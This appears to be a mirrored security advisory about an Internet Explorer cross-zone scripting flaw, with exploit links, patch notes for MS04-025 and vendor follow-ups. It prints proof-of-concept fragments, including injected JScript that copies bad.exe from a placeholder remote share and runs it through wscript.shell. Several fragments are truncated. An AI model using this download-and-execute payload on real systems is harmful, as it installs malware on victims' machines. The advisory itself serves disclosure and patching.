Microsoft Windows Server 2003 Enterprise Edition Itanium 0
+
Microsoft Windows Server 2003 Standard Edition
+
Microsoft Windows Server 2003 Standard Edition
+
Microsoft Windows Server 2003 Standard Edition
+
Microsoft Windows Server 2003 Web Edition
+
Microsoft Windows Server 2003 Web Edition
+
Microsoft Windows Server 2003 Web Edition
+
Microsoft Windows XP Home
+
Microsoft Windows XP Home
+
Microsoft Windows XP Home
+
Microsoft Windows XP Professional
+
Microsoft
-
漏洞讨论
Microsoft Internet Explorer is prone to a vulnerability that may permit cross-zone access, allowing an attacker to execute malicious script code in the context of the Local Zone. It is possible to exploit this issue by passing a dynamically created IFrame to a modal dialog.
This vulnerability could be exploited in combination with a number of other security issues, such as the weakness described in BID 10472. The end result of successful exploitation is execution of arbitrary code in the context of the client user.
It may also be possible to exploit this vulnerability to access properties of a foreign domain, allowing for other types of attacks that compromise sensitive or private information associated with a domain of the attacker's choosing.
-
漏洞利用
An ASP version of this exploit is available at the following location: http://ferruh.mavituna.com/article/?553
An updated version of the Jelmer exploit implemented in ASPX (The-Insider.zip) has been published by Rafel Ivgi. Further details in regards to this exploit can be found in the associated discussion reference.
An updated version of the Jelmer exploit implemented in PHP (dir.zip) has been published by Liu Die Yu. The payload.exe executable has been removed from the exploit archive. Further details in regards to this exploit can be found in the associated discussion reference.
There are reports of exploits circulating in the wild that employ this issue and BID 10472.
A proof-of-concept has been published at the following location:
An additional proof of concept is also available: Exploit page: <HTML> <SCRIPT> //liudieyuinchina AT yahoo DzeroT com DzeroT cn //ALL IE SECURITY MESSAGES!!!!!! always up2hour at http://iebug.com //http://umbrella.name/ //message: davinci is still alive
md.htm contains: <HTML> Close this dialog when google is loaded in the main window.
<SCRIPT> //liudieyuinchina AT yahoo DzeroT com DzeroT cn //ALL IE SECURITY MESSAGES!!!!!! always up2hour at http://iebug.com //http://umbrella.name/ //message: davinci is still alive
An additional proof of concept exploit supplied by, Ferruh Mavituna, that is reported to bypass vendor fixes is available: New shellscript.js ===================================================== function injectIt() {
document.frames[0].document.body.insertAdjacentHTML('afterBegin','injected<s cript language="JScript" DEFER> var rF="\\\\\\\\IPADDRESS\\\\NULLSHAREDFOLDER\\\\bad.exe"; var wF="%windir%\\\\_tmp.exe"; var o=new ActiveXObject("wscript.shell"); var e="%comspec% /c copy "+rF+" "+wF; var err=o.Run(e,0,true);if(err==0)o.Run(wF,0,false);</script>'); } document.write('<iframe src="shell:WINDOWS\\Web\\TIP.HTM"></iframe>'); setTimeout("injectIt()", 1000); =====================================================
Also for testing in IIS Servers; ASP equivalent of redir.jsp
redir.asp ===================================================== <% Response.Expires = 1 Response.Expiresabsolute = Now() - 1 Response.AddHeader "pragma","no-cache" Response.AddHeader "cache-control","private" Response.CacheControl = "no-cache" For x = 1 to 500000 'Time z = z + 10 Next
Microsoft has released Security Bulletin MS04-025 to address this issue. This bulletin provides a cumulative patch for Internet Explorer to fix multiple vulnerabilities in supported versions of the application.
MS04-025 has been revised to provide updated fix information for Windows XP running Windows Update Version 5. Please see the attached Security Bulletin for further details.
Avaya has released advisory ASA-2004-26 dealing with this issue for their Avaya System Products. Please see the referenced web advisory for more information.
HP has reported that the application of the Microsoft patch included in MS04-025 may prevent users from logging into HP Systems Insight Manager with the Internet Explorer browser. HP has released an advisory (HPSBMA01072) and fixes to address this issue in the Systems Insight Manager. Please see the referenced advisory for further details regarding obtaining and applying an appropriate patch.
HP has released a revised advisory HPSBMA01076 (SSRT4787 Revised - HP Systems Insight Manager (SIM) for HP-UX Remote Denial of Service (DoS)) to address this issue. Please see the referenced advisory for more information.